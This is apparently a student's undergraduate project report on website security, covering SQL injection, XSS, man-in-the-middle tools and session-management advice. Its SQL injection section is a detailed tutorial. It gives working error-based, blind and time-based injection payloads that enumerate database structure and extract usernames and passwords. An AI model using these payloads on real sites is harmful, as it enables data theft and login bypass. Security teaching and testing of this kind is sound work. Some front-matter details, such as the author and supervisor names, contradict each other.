final report noby
Post on 13-May-2017
222 Views
Preview:
TRANSCRIPT
WEBSITE SECURITYA Major Project Report
submitted in partial fulfillment of therequirements for the award of the degree
of
Bachelor of Technology
in
COMPUTER SCIENCE AND ENGINEERING
UNDER GUIDENCE OF Er. Chetan Sharma
ByNoby Kumar Das(100960334990)100960334990
DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERINGSURYA SCHOOL OF ENGINEERING AND TECHNOLOGY, BAPROR
April,2014
CERTIFICATE
I hereby certify that the work which is being presented in the B.Tech. Major Project Report entitled “Website Security”, in partial fulfillment of the requirements for the award of the Bachelor of Technology in Computer Science & Engineering and submitted to the Department of Computer Science & Engineering of Surya World Institutions of Academic Excellence Rajpura PB is an authentic record of my own work carried out during a period from January 2014 to April 2014 under the supervision of Er. Chetan Sharma, CSE Department.
The matter presented in this thesis has not been submitted by me for the award of any other degree elsewhere.
Signature of CandidateNOBY KUMAR DAS
100960334990
This is to certify that the above statement made by the candidate is correct to the best of my knowledge.
Signature of Supervisor(s)
Date: Er. Chetan Sharma Project Supervisor(s)
HeadDepartment of Computer Science & EngineeringSurya World Institutions of Academic Excellence , Bapror , Rajpura
1
Abstract
Hacking has become a significant threat to networks exposed to the Internet. In order to prevent
systems from being hacked, the methods used by hackers must be well understood. Hackers
begin by selecting and footprinting a target network. Once the target network is mapped, hackers
proceed to map vulnerabilities and gain access by cracking passwords, using stack-smashing
attacks, or spoofing the IP address of trusted machines. Hackers can then sniff internal network
traffic or find other hosts that contain vital company secrets. Finally, a hacker can clean up
system logs in order to conceal the fact that an attack occurred. In this paper we explain how
each of these attack techniques is carried out.
The rapid and dramatic advances in information technology (IT) in recent years have
without question generated tremendous benefits. However, they have created significant and
unprecedented risks to operations. Computer security has, in turn, become much more important
as all levels of an organization to utilize information systems security measures to avoid data
tampering, fraud, disruptions in critical operations, and inappropriate of sensitive information.
After the boom in Networking and Software jobs, the past two year have seen a sharp rise in the
field of information security. Information Security and Ethical Hacking is the latest buzzword in
the industry. In the past five years, the percentage of hacking crimes, data thefts, data losses,
viruses and other cyber crimes have increased exponentially.
2
ACKNOWLEDGMENT
I am highly grateful to the Mrs. Renu, HOD CSE, Surya College of Engineering & Technology, Rajpura, for providing this opportunity to carry out the six month industrial training at Secugenius Security Solutions, Ludhiana.
I would like to expresses my gratitude to other faculty members of Computer Science & Engineering department of SECT, Rajpura for providing academic inputs, guidance & encouragement throughout the training period.
I would like to express a deep sense of gratitude and thank Er. Chetan Sharma,Project Supervisor, without whose permission, wise counsel and able guidance, it would have not been possible to pursue my training in this manner.
The satisfaction that accompanies that the successful completion of any task would be incomplete without the mention of people whose ceaseless cooperation made it possible, whose constant guidance and encouragement crown all efforts with success. We are grateful to our project guide Mr. Chetan Soni for the guidance, inspiration and constructive suggestions that were helpful in the preparation of this project.
Finally, I express my indebtedness to all who have directly or indirectly contributed to the successful completion of my industrial training.
Sarabjeet Singh Marwaha
3
Contents1. Introduction2. Need for Ethical Hacking and Cyber Security3. Project: Website Security4. SQL Injection5. CSS Attack6. Man in the Middle Attack7. Conclusion8. References
4
List of Figures1. Boolean Attack Error2. Home Page of Attack Site3. Login to admin panel using SQL Injection Query4. Successful Entrance to the Admin Panel5. Database Stored on the website
5
IntroductionThe Internet has become a widely used medium for companies, schools, and governments to
share data. Because of the need to exchange electronic information, most computer networks are
connected and exposed to traffic on the Internet. With this exposure comes security concerns.
Hackers are a significant threat because often all that lies between a hacker and a company’s
internal secrets may be a poorly administered firewall or border router.
How significant is this threat? A sampling of traffic into and out of a network over a few
days will often show hundreds, perhaps thousands of potentially malicious data packets.
Hundreds of hacking web sites have been born over the past years providing information ranging
from how to spoof email to how to gain root access on web servers. Hackers need not understand
the technology behind their methods; they can simply download a script and go to work. In
essence, the threat of a network being attacked is significant and should not be taken lightly
because even the novice hacker is capable of launching a potentially damaging attack.
How can hackers be stopped? To answer this question, it is important to understand how
a hacker attacks a system. From footprinting to log cleanup, a hacker’s methodology must be
well understood so that firewalls and Intrusion Detection Systems (IDS) can be built to prevent
or detect future attacks.
6
Need For Ethical Hacking and Cyber Security
To catch a thief, think like a thief. That’s the basis for ethical hacking.
Ethical hacking must be encouraged for detection and prevention of automated application
attacks, because hackers are becoming adept at automating attacks by intensifying computerised
attacks at smaller, vulnerable and largely homogenous targets.
With the increased numbers and expanding knowledge of hackers combined with the
growing number of system vulnerabilities and other unknowns, the time will come when all
computer systems are hacked or compromised in some way. Protecting your systems from the
bad guys — and not just the generic vulnerabilities that everyone knows about — is absolutely
critical. Hacking preys on weak security practices and undisclosed vulnerabilities. Firewalls,
encryption, and virtual private networks (VPNs) can create a false feeling of safety. These
security systems often focus on high-level vulnerabilities, such as viruses and traffic through a
firewall, without affecting how hackers work. Attacking your own systems to discover
vulnerabilities is a step to making them more secure. This is the only proven method of greatly
hardening your systems from attack. If you don’t identify weaknesses, it’s a matter of time
before the vulnerabilities are exploited. As hackers expand their knowledge, so should you. You
must think like them to protect your systems from them. You, as the ethical hacker, must know
activities hackers carry out and how to stop their efforts. You should know what to look for and
how to use that information to thwart hackers’ efforts. You don’t have to protect your systems
from everything. You can’t. The only protection against everything is to unplug your computer
systems and lock them away so no one can touch them — not even you. That’s not the best
approach to information security. What’s important is to protect your systems from known
vulnerabilities and common hacker attacks. It’s impossible to buttress all possible vulnerabilities
on all your systems. You can’t plan for all possible attacks — especially the ones that are
currently unknown. However, the more combinations you try — the more you test whole
systems instead of individual units — the better your chances of discovering vulnerabilities that
affect everything as a whole. It makes little sense to harden your systems from unlikely attacks.
For instance, if you don’t have a lot of foot traffic in your office and no internal Web server
running, you may not have as much to worry about as an Internet hosting provider would have.
However, don’t forget about insider threats from malicious employees!
7
Project: Website SecurityWebsite Security is an application that restricts access to certain areas within your Website.
These areas are protected by Hostname, by IP address, or by username and password. Web
application security is a branch of Information Security that deals specifically with security of
websites, web applications and web services.
At a high level, Web application security draws on the principles of application
security but applies them specifically to Internet and Web systems. Typically web applications
are developed using programming languages such as PHP, Java EE, Java, Python, Ruby,
ASP.NET, C#, VB.NET or Classic ASP.
Security threatsWith the emergence of Web 2.0, increased information sharing through social networking and
increasing business adoption of the Web as a means of doing business and delivering service,
websites are often attacked directly. Hackers either seek to compromise the corporate network or
the end-users accessing the website by subjecting them to drive-by downloading.
As a result, industry is paying increased attention to the security of the web applications
themselves in addition to the security of the underlying computer network and operating systems.
The majority of web application attacks occur through cross-site scripting (XSS) and SQL
injection attacks which typically result from flawed coding, and failure to sanitize input to and
output from the web application. These are ranked in the 2009 CWE/SANS Top 25 Most
Dangerous Programming Errors. According the security vendor Cenzic, the top vulnerabilities in
March 2012 include:
Cross Site Scripting, 37%
SQL Injection, 16%
Path Disclosure, 5%
Denial of Service, 5%
Code Execution, 4%
Memory Corruption, 4%
Cross Site Request Forgery, 4%
Information Disclosure, 3%
Arbitrary File, 3%
Local File Include, 2%
8
Remote File Include, 1%
Buffer overflow, 1%
Other (PHP Injection, Javascript Injection, etc.), 15%
Security standardsOWASP is the emerging standards body for Web application security. In particular they have
published the OWASP Top 10 which describes in detail the major threats against web
applications. The Web Application Security Consortium (WASC) has created the Web Hacking
Incident Database and also produced open source best practice documents on Web application
security.
Security technologyWhile security is fundamentally based on people and processes, there are a number of technical
solutions to consider when designing, building and testing secure web applications. At a high
level, these solutions include:
Black Box testing tools such as Web application security scanners, vulnerability scanners
and penetration testing software
White Box testing tools such as static source code analyzers
Fuzzing Tools used for input testing
Web application firewalls (WAF) used to provide firewall-type protection at the web
application layer
Password cracking tools for testing password strength and implementation
AttackAttacks are the techniques that attackers use to exploit the vulnerabilities in applications. Attacks
are often confused with vulnerabilities, so please try to be sure that the attack you are describing
is something that an attacker would do, rather than a weakness in an application.
Examples:
Brute Force: Is an exhaustive attack that works by testing every possible value of a
parameter (password, file name, etc.) Brute_force_attack
Cache Poisoning: Is an attack that seeks to introduce false or malicious data into a web
cache, normally via HTTP Response Splitting. Cache_Poisoning
9
DNS Poisoning: Is an attack that seeks to introduce false DNS address information into
the cache of a DNS server, where it will be served to other users enabling a variety of
attacks. (e.g., Phishing)
Various Attacks Used in Website Hacking1. SQL Injection
2. Shell uploading
3. LFI
4. RFI
5. XSS
6. cSRF(XSRF)
7. Symlinking
8. SSI
9. HTML Injection
10. Server Rooting
10
SQL Injection
SQL injection (Structured Query Language Injection) is the first step in the entry to exploiting or
hacking websites. Sqli is just basically injecting queries into a database or using queries to get
authorization bypass as an admin.
A SQL injection attack consists of insertion or "injection" of a SQL query
via the input data from the client to the application. A successful SQL injection exploit can read
sensitive data from the database, modify database data (Insert/Update/Delete), execute
administration operations on the database (such as shutdown the DBMS), recover the content of
a given file present on the DBMS file system and in some cases issue commands to the operating
system. SQL injection attacks are a type of injection attack, in which SQL commands are
injected into data-plane input in order to effect the execution of predefined SQL commands.
Threat Modeling SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause
repudiation issues such as voiding transactions or changing balances, allow the complete
disclosure of all data on the system, destroy the data or make it otherwise unavailable,
and become administrators of the database server.
SQL Injection is very common with PHP and ASP applications due to the prevalence of
older functional interfaces. Due to the nature of programmatic interfaces available, J2EE
and ASP.NET applications are less likely to have easily exploited SQL injections.
The severity of SQL Injection attacks is limited by the attacker’s skill and imagination,
and to a lesser extent, defense in depth countermeasures, such as low privilege
connections to the database server and so on. In general, consider SQL Injection a high
impact severity.
SQL injection errors occur when:
1. Data enters a program from an untrusted source.
2. The data used to dynamically construct a SQL query
The main consequences are:
Confidentiality: Since SQL databases generally hold sensitive data, loss of
confidentiality is a frequent problem with SQL Injection vulnerabilities.
11
Authentication: If poor SQL commands are used to check user names and passwords, it
may be possible to connect to a system as another user with no previous knowledge of the
password.
Authorization: If authorization information is held in a SQL database, it may be possible
to change this information through the successful exploitation of a SQL Injection
vulnerability.
Integrity: Just as it may be possible to read sensitive information, it is also possible to
make changes or even delete this information with a SQL Injection attack.
12
Technique of SQL Injection
a) String ErrorTo make this simple to understand, String Based SQL injection happens when the site is
vulnerable to SQL injection but doesn't show us the results needed to be displayed after
executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is
vuln to SQLi)
Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with
SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+
b) Boolean Exploitation TechniqueThe Boolean exploitation technique is very useful when the tester finds a Blind SQL
Injection situation, in which nothing is known on the outcome of an operation. For
example, this behavior happens in cases where the programmer has created a custom
error page that does not reveal anything on the structure of the query or on the database.
(The page does not return a SQL error, it may just return a HTTP 500, 404, or redirect).
13
By using inference methods, it is possible to avoid this obstacle and thus to succeed in
recovering the values of some desired fields. This method consists of carrying out a series
of boolean queries against the server, observing the answers and finally deducing the
meaning of such answers. We consider, as always, the www.example.com domain and
we suppose that it contains a parameter named id vulnerable to SQL injection. This
means that carrying out the following request:
http://www.example.com/index.php?id=1'
We will get one page with a custom message error which is due to a syntactic error in the
query. We suppose that the query executed on the server is:
SELECT field1, field2, field3 FROM Users WHERE Id='$Id'
Which is exploitable through the methods seen previously. What we want to obtain is the
values of the username field. The tests that we will execute will allow us to obtain the
value of the username field, extracting such value character by character. This is possible
through the use of some standard functions, present in practically every database. For our
examples, we will use the following pseudo-functions:
SUBSTRING (text, start, length): returns a substring starting from the position "start" of
text and of length "length". If "start" is greater than the length of text, the function returns
a null value.
ASCII (char): it gives back ASCII value of the input character. A null value is returned if
char is 0.
LENGTH (text): it gives back the number of characters in the input text.
Through such functions, we will execute our tests on the first character and, when we have
discovered the value, we will pass to the second and so on, until we will have discovered the
entire value. The tests will take advantage of the function SUBSTRING, in order to select
only one character at a time (selecting a single character means to impose the length
parameter to 1), and the function ASCII, in order to obtain the ASCII value, so that we can
do numerical comparison. The results of the comparison will be done with all the values of
the ASCII table, until the right value is found. As an example, we will use the following
value for Id:
$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1
That creates the following query (from now on, we will call it "inferential query"):
14
SELECT field1, field2, field3 FROM Users WHERE Id='1' AND
ASCII(SUBSTRING(username,1,1))=97 AND '1'='1'
The previous example returns a result if and only if the first character of the field username is
equal to the ASCII value 97. If we get a false value, then we increase the index of the ASCII
table from 97 to 98 and we repeat the request. If instead we obtain a true value, we set to zero
the index of the ASCII table and we analyze the next character, modifying the parameters of
the SUBSTRING function. The problem is to understand in which way we can distinguish
tests returning a true value from those that return false. To do this, we create a query that
always returns false. This is possible by using the following value for Id:
$Id=1' AND '1' = '2
Which will create the following query:
SELECT field1, field2, field3 FROM Users WHERE Id='1' AND '1' = '2'
The obtained response from the server (that is HTML code) will be the false value for our
tests. This is enough to verify whether the value obtained from the execution of the
inferential query is equal to the value obtained with the test executed before. Sometimes, this
method does not work. If the server returns two different pages as a result of two identical
consecutive web requests, we will not be able to discriminate the true value from the false
value. In these particular cases, it is necessary to use particular filters that allow us to
eliminate the code that changes between the two requests and to obtain a template. Later on,
for every inferential request executed, we will extract the relative template from the response
using the same function, and we will perform a control between the two templates in order to
decide the result of the test.
In the previous discussion, we haven't dealt with the problem of determining the termination
condition for out tests, i.e., when we should end the inference procedure. A techniques to do
this uses one characteristic of the SUBSTRING function and the LENGTH function. When
the test compares the current character with the ASCII code 0 (i.e., the value null) and the
test returns the value true, then either we are done with the inference procedure (we have
scanned the whole string), or the value we have analyzed contains the null character.
We will insert the following value for the field Id:
$Id=1' AND LENGTH(username)=N AND '1' = '1
15
Where N is the number of characters that we have analyzed up to now (not counting the null
value). The query will be:
SELECT field1, field2, field3 FROM Users WHERE Id='1' AND LENGTH(username)=N
AND '1' = '1'
The query returns either true or false. If we obtain true, then we have completed the inference
and, therefore, we know the value of the parameter. If we obtain false, this means that the
null character is present in the value of the parameter, and we must continue to analyze the
next parameter until we find another null value.
The blind SQL injection attack needs a high volume of queries. The tester may need an
automatic tool to exploit the vulnerability.
c) Blind QueryBlind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks
the database true or false questions and determines the answer based on the applications
response. This attack is often used when the web application is configured to show generic
error messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error
messages from the database complaining that the SQL Query's syntax is incorrect. Blind
SQL injection is nearly identical to normal SQL Injection, the only difference being the way
the data is retrieved from the database. When the database does not output data to the web
page, an attacker is forced to steal data by asking the database a series of true or false
questions. This makes exploiting the SQL Injection vulnerability more difficult, but not
impossible.
d) Double Query SQL - Double Query SQL Injection is a method for querying SQL
databases by using two queries together combined in a single query statement. This
basically ends up confusing the backend database and causing errors to be thrown. The
errors received will contain the information we are trying to extract, just like previous
error-based SQL injection examples I have covered.
NOTE: I should also note that while it is definately faster than Blind & Time-Based
injections, we will not have the ability to access anything using GROUP_CONCAT() which
means we will need to heavily rely on CONCAT() and the LIMIT feature to get all of the
info from the database.
16
OK now that you have an idea of what it is, let us begin testing it out and see it in action.
When it comes to testing a site for vulnerability you can run the standrd checks for basic
Union injection. If they work then no need to complicate things with Double Queries, but
when those fail it is time to test Double Query injections. This is our last hope of finding an
injection vector, assuming you have tested all other methods prior to this one (I do).
Anyways, we can use Double Query injection to test for the current database name first and
then work our way through the rest of the databse if it works. If it returns a value then we
have found a vulnerability and can continue, if not then you may be S.O.L. since I have given
you all my SQLi methods. Here is what the query looks like to run a quick check for the
current database:
COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
RESULT:
duplicate entry '~'MyCurrent_DB'~1' for key 1
Fig. 1 Boolean Attack Error
17
As you can see the site is vulnerable and returned an error with the current database listed in
the error, in this case "MyCurrent_DB". If you are scratching your head trying to figure this
one out, here is the breakdown. We have used both floor() and rand() to query
information_schema.tables which are being nulled out in this request as floor(rand(0)*2) is
null, which allows the rest of our request to be processed and return the current database
name. The basic syntax will repeat itself so you will pick it up over time if it doesn’t catch on
right away. Moving on...Now that we know it is vulnerable we can test for additional
databases, as well as version info and user info,. Once the basic system info is grasped we
can move on to grabbing tables, columns, and finally extraction of data. In order to test for
additional databases we need to first grab the count by alter the above request to:
COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
(SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM
information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x from information_schema.tables GROUP BY x)a)
RESULT:
Duplicate entry '~'Number_of_Databases_Available'~1' for key 1
Now that we have the count we can alter the above to use CONCAT and LIMIT to grab the
name of each database available, like this:
COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
(SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM
information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
NOTE: You will need to keep incrementing the value of "N" in the middle of the above
query to work your way through the available DB names, just keep going until you have
reached the number returned in our request above this one. (i.e. LIMIT 0,1 followed by
LIMIT 1,1 followed by LIMIT 2,1 and just repeat as needed). We have to do this since we
can’t use GROUP_CONCAT() :(
RESULT:
Duplicate entry '~'Name_of_Database'~1' for key 1
18
*Message will appear the same, but LIMIT will be changed to get different DB Name each
time
Once you have all the DB names you might want to find out the current user and confirm
version info as well as some other basic stuff. It can be done using slight variations to our
original query for current database which would look like this, notice only the call in the
middle is being altered:
VERSION:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
RESULT:
Duplicate entry '~'5.1.1-log'~1' for key 1
USER:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
concat(user())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
RESULT:
Duplicate entry '~'dumbdba@localhost'~1' for key 1
DATADIR:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
concat(@@datadir)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x
FROM information_schema.tables GROUP BY x)a)
RESULT:
Duplicate entry '~'/var/mysql/'~1' for key 1
HOSTNAME:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
concat(@@hostname)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x
FROM information_schema.tables GROUP BY x)a)
RESULT:
Duplicate entry '~'10.10.10.10@255.255.255.0'~1' for key 1
19
NOTE: DATADIR & HOSTNAME might not always work, depending on version and DB
setup
Alright, we have gathered the basic info so now it is time to move on to actually grabbing the
table and column names. As with other methods we will start with tables and then work to
columns, and like the above examples we will be using CONCAT and LIMIT to allow us to
get the entire contents since we cant use GROUP_CONCAT(). We first get the count and
then enumerate the tables. It looks like this:
COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM
`information_schema`.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME>))
FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
RESULT:
Duplicate entry 'Number_Of_Tables' for key 1
Once the count is known, we enumerate tables one by one...
COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
(SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM
information_schema.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME>
LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
RESULT:
Duplicate entry 'TABLE_Name' for key 1
You will need to HEX the DB Name from which you are pulling table names from or it will
not be properly processed, same is true if you are pulling columns from tables as we will do
in this next step now that we have found some tables. Grabbing the column count looks like
this:
COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM
20
`information_schema`.columns WHERE table_schema=<HEX_VLAUE_OF_DB_NAME>
AND table_name=<HEX_VLAUE_OF_TABLE_NAME>)) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)
RESULT:
Duplicate entry 'Number_Of_Columns_In_Table' for key 1
Once the number of columns is known we can just use LIMIT again to sort through them one
by one, just keep incrementing LIMIT until you have found as many as it returned in the
above request. Grabbing actual columns looks like this:
COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select
(select distinct concat(cast(column_name as char)) FROM information_schema.columns
WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> AND
table_name=<HEX_VLAUE_OF_TABLE_NAME> LIMIT 0,1)) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)
RESULT:
Duplicate entry 'COLUMN_Name' for key 1
OK, so now we have outlined the entire database structure and know the tables and columns.
Now it is finally time to extract the desired data from the database. In order to do this we
change the query to look like this:
COMMAND:
http://site.com/index.php?id=5+and+(select 1
FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3
a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM
information_schema.tables+GROUP BY x)b)
RESULT:
Duplicate entry ':admin:adminpass:admin@localhost:' for key 1
21
Type Of SQL Injection.1) Poorly Filter String - Poorly filter string are caused by user input which is not filter by
escape character.
Escape Character - A escape character are the character which is used to abort the current
command and go back to the previous command.
2) Incorrect Type Handling - In this type of data type if the input is not valid which is
menupulated by SQL Server.
3) Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks
the database true or false questions and determines the answer based on the applications
response. This attack is often used when the web application is configured to show generic error
messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages
from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is
nearly identical to normal SQL Injection, the only difference being the way the data is retrieved
from the database. When the database does not output data to the web page, an attacker is forced
to steal data by asking the database a series of true or false questions. This makes exploiting the
SQL Injection vulnerability more difficult, but not impossible.
Examples
Content-based
Using a simple page, which displays an article with given ID as the parameter, the attacker may
perform a couple of simple tests to determine if the page is vulnerable to SQL Injection attacks.
Example URL:
http://newspaper.com/items.php?id=2
sends the following query to the database:
SELECT title, description, body FROM items WHERE ID = 2
The attacker may then try to inject a query that returns 'false':
http://newspaper.com/items.php?id=2 and 1=2
Now the SQL query should looks like this:
SELECT title, description, body FROM items WHERE ID = 2 and 1=2
22
If the web application is vulnerable to SQL Injection, then it probably will not return anything.
To make sure, the attacker will inject a query that will return 'true':
http://newspaper.com/items.php?id=2 and 1=1
If the content of the page that returns 'true' is different than that of the page that returns 'false',
then the attacker is able to distinguish when the executed query returns true or false.
Once this has been verified, the only limitations are privileges set up by the database
administrator, different SQL syntax, and the attacker's imagination.
Time-based
This type of blind SQL injection relies on the database pausing for a specified amount of time,
then returning the results, indicating successful SQL query executing. Using this method, an
attacker enumerates each letter of the desired piece of data using the following logic:
If the first letter of the first database's name is an 'A', wait for 10 seconds.
If the first letter of the first database's name is an 'B', wait for 10 seconds. etc.
Microsoft SQL Server
http://www.site.com/vulnerable.php?id=1' waitfor delay '00:00:10'--
MySQL
SELECT IF(expression, true, false)
Using some time-taking operation e.g. BENCHMARK(), will delay server responses if the
expression is True.
BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))
- will execute the ENCODE function 5000000 times.
Depending on the database server's performance and load, it should take just a moment to finish
this operation. The important thing is, from the attacker's point of view, to specify a high-enough
number of BENCHMARK() function repetitions to affect the database response time in a
noticeable way.
Example combination of both queries:
1 UNION SELECT IF(SUBSTRING(user_password,1,1) =
CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users
WHERE user_id = 1;
23
If the database response took a long time, we may expect that the first user password character
with user_id = 1 is character '2'.
(CHAR(50) == '2')
Using this method for the rest of characters, it's possible to enumerate entire passwords stored in
the database. This method works even when the attacker injects the SQL queries and the content
of the vulnerable page doesn't change.
Obviously, in this example, the names of the tables and the number of columns was specified.
However, it's possible to guess them or check with a trial and error method.
Databases other than MySQL also have time-based functions which allow them to be used for
time-based attacks:
MS SQL 'WAIT FOR DELAY '0:0:10
PostgreSQL - pg_sleep()
Conducting Blind_SQL_Injection attacks manually is very time consuming, but there are a lot of
tools which automate this process. One of them is SQLMap (http://sqlmap.org/) partly developed
within OWASP grant program. On the other hand, tools of this kind are very sensitive to even
small deviations from the rule. This includes:
scanning other website clusters, where clocks are not ideally synchronized,
WWW services where argument acquiring method was changed, e.g. from /index.php?
ID=10 to /ID,10
Remote Database Fingerprinting
If the attacker is able to determine when his query returns True or False, then he may fingerprint
the RDBMS. This will make the whole attack much easier. If the time-based approach is used,
this helps determine what type of database is in use. Another popular methods to do this is to call
functions which will return the current date. MySQL, MSSQL, and Oracle have different
functions for that, respectively now(), getdate(), and sysdate().
24
SQL Injection Applying on Admin Panel
Fig.2 Home Page of Attack Site
Fig.3 Login to admin panel using SQL Injection Query
25
Fig.4 Successful Entrance to the Admin Panel
Fig.5 Database stored on the websit
26
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.
Cross-Site Scripting (XSS) attacks occur when:
1. Data enters a Web application through an untrusted source, most frequently a web request.
2. The data is included in dynamic content that is sent to a web user without being validated for malicious script.
The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.
CSRF Security Measures
HTML Entity Encoding
HTML entity encoding is the process of replacing ASCII characters with their 'HTML Entity' equivalents. For example, you would replace the "<" character with "<"
Using HTML entity encoding is useful because HTML entities are 'inert' in most interpreters, especially browsers. This means that even if an attacker tricks your application into sending malicious code to another user's browser, the attack won't execute.
27
Input Validation
Input validation refers to the process of validating all the input to an application before using it. Input validation is absolutely critical to application security, and most application risks involve tainted input at some level.
Many applications do not plan input validation, and leave it up to the individual developers. This is a recipe for disaster, as different developers will certainly all choose a different approach, and many will simply leave it out in the pursuit of more interesting development.
28
Man-in-the-middle attack
The man-in-the middle attack intercepts a communication between two systems. For example, in an http transaction the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication.
Fig.6 Man in the Middle Attack
29
MITM Attack tools
There are several tools to realize a MITM attack. These tools are particularly efficient in LAN network environments, because they implement extra functionalities, like the arp spoof capabilities that permit the interception of communication between hosts.
PacketCreator Ettercap Dsniff Caine Abel
MITM Proxy only tools
Proxy tools only permit interactiion with the parts of the HTTP protocol, like the header and the body of a transaction, but do not have the capability to intercept the TCP connection between client and server. To intercept the communication, it’s necessary to use other network attack tools or configure the browser.
OWASP WebScarab Paros Proxy Burp Proxy ProxyFuzz Odysseus Proxy Fiddler (by Microsoft)
30
Conclusion
Security of Website
Session Management
Things To Do
All applications in your organization should be developed following these design goals:
All applications should share a well-debugged and trusted session management mechanism.
All session identifiers should be sufficiently randomized so as to not be guessable. All session identifiers should use a key space of at least XXXX bits. All session identifiers should use the largest character set available to it. Sessions SHOULD timeout after 5 minutes for high-value applications, 10 minutes for
medium value applications, and 20 minutes for low risk applications. All session tokens in high value applications SHOULD be tied to a specific HTTP client
instance (session identifier and IP address). Application servers SHOULD use private temporary file areas per client/application to
store session data. All applications SHOULD use a cryptographically secure page or form nonce in a hidden
form field. Each form or page nonce SHOULD be removed from the active list as soon as it is
submitted. Session ID values submitted by the client should undergo the same validation checks as
other request parameters. High value applications SHOULD force users to re-authenticate before viewing high-
value resources or complete high-value transactions. Session tokens should be regenerated prior to any significant high value transaction. In high-value applications, session tokens should be regenerated after a certain number of
requests. In high-value applications, session tokens should be regenerated after a certain period of
time. For all applications, session tokens should be regenerated after a change in user privilege. Applications should log attempts to continue sessions based on invalid session identifiers. Applications should, if possible, conduct all traffic over HTTPS. If applications use both HTTP and HTTPS, they MUST regenerate the identifier or use
an additional session identifier for HTTPS communications.
31
Things Not To Do
Applications should NOT use as variables any user personal information (user name, password, home address, etc.).
Highly protected applications should not implement mechanisms that make automated requests to prevent session timeouts.
Highly protected applications should not implement "remember me" functionality. Highly protected applications should not use URL rewriting to maintain state when
cookies are turned off on the client. Applications should NOT use session identifiers for encrypted HTTPS transport that have
once been used over HTTP.
32
References
1. https://www.owasp.org/index.php/SQL_Injection2. http://zerofreak.blogspot.in/2012/03/tutorial-by-
zer0freak-difficulty-easy.html3. https://www.owasp.org/index.php/
Testing_for_SQL_Injection_(OWASP-DV-005)#Boolean_Exploitation_Technique
